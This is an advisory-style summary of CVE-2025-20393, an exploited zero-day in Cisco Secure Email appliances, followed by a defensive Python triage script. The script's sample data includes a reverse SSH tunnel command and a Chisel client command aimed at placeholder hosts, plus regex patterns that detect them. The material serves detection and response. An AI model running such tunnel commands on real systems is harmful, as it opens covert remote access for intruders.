What happened
A critical zero-day remote code execution vulnerability in Cisco Secure Email Gateway and Secure Email and Web Manager appliances has been actively exploited since November 2025. Tracked as CVE-2025-20393, the flaw allows unauthenticated attackers to execute root-level commands via crafted HTTP requests targeting the Spam Quarantine feature. Cisco Talos researchers attribute the attacks to the China-linked advanced persistent threat actor UAT-9686 (UNC-9686), noting tooling overlaps with APT41 and UNC5174. The threat actors deployed a Python-based backdoor, AquaShell, along with AquaTunnel and Chisel for lateral movement, and AquaPurge to remove logs. Exploitation focused on espionage in telecommunications and critical infrastructure sectors, with attackers gaining persistent access and internal pivoting capabilities. CISA added the CVE to its Known Exploited Vulnerabilities catalog in December 2025.
Who is affected
Organizations using affected Cisco Secure Email Gateway and Secure Email and Web Manager appliances are directly exposed if Spam Quarantine is enabled and internet-facing. Indirect exposure may include networks connected to compromised appliances.
Why CISOs should care
Zero-day exploitation in core email security appliances can compromise enterprise communications, provide persistent attacker footholds, and enable lateral movement into sensitive internal systems, increasing risk of espionage and operational disruption.
3 practical actions
- Apply Cisco patches immediately: Upgrade appliances to the fixed releases and verify Spam Quarantine configuration.
- Isolate vulnerable interfaces: Firewall management ports and keep mail and administration interfaces off the internet.
- Audit for compromise indicators: Check for AquaShell persistence, reverse SSH tunnels, and log-wiping activity using TAC guidance.
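The audit step above, as an added example that is not from Cisco, Cisco Talos or the original advisory: a small Python triage helper that scans an exported process listing for reverse SSH tunnels and Chisel clients, and flags holes in a log timeline that would be consistent with log wiping. The process list, the syslog lines, the hostnames and the detection patterns are all constructed assumptions; the appliance's real paths and log formats are not known here, so run it on text exported per TAC guidance, not on the appliance itself.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process listing (not real data from the advisory).
SAMPLE_PS = """\
PID   USER  COMMAND
1012  root  /usr/sbin/sshd -D
2231  root  ssh -N -R 2222:127.0.0.1:22 -o StrictHostKeyChecking=no ops@203.0.113.10
2410  root  /tmp/.cache/chisel client 198.51.100.7:443 R:socks
3001  root  python3 /data/mail/quarantine.py
"""

# Constructed sample syslog excerpt with a multi-hour hole in the timeline.
SAMPLE_LOG = """\
2025-11-20T01:00:11 info: quarantine session opened
2025-11-20T01:05:42 info: quarantine session closed
2025-11-20T09:30:03 info: quarantine session opened
2025-11-20T09:31:15 info: quarantine session closed
"""

# Assumed patterns: an ssh client with a remote forward (-R), and a chisel client.
REVERSE_SSH = re.compile(r"\bssh\b.*\s-R\s*\d+:")
CHISEL = re.compile(r"\bchisel\b.*\bclient\b")

def suspicious_processes(ps_text):
    """Return (pid, reason, cmd) for reverse SSH tunnels and chisel clients."""
    hits = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, _user, cmd = parts
        if REVERSE_SSH.search(cmd):
            hits.append((int(pid), "reverse-ssh-tunnel", cmd))
        elif CHISEL.search(cmd):
            hits.append((int(pid), "chisel-client", cmd))
    return hits

def log_gaps(log_text, max_gap=timedelta(hours=1)):
    """Return (start, end) pairs where consecutive entries are further apart than max_gap.

    A gap in a log that normally records steady activity is one signal worth
    correlating with other evidence of log wiping; it is not proof on its own.
    """
    stamps = [datetime.fromisoformat(l.split(" ", 1)[0])
              for l in log_text.splitlines() if l.strip()]
    return [(a, b) for a, b in zip(stamps, stamps[1:]) if b - a > max_gap]
```

Tune `max_gap` to the appliance's normal logging cadence so quiet overnight periods do not produce false positives.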
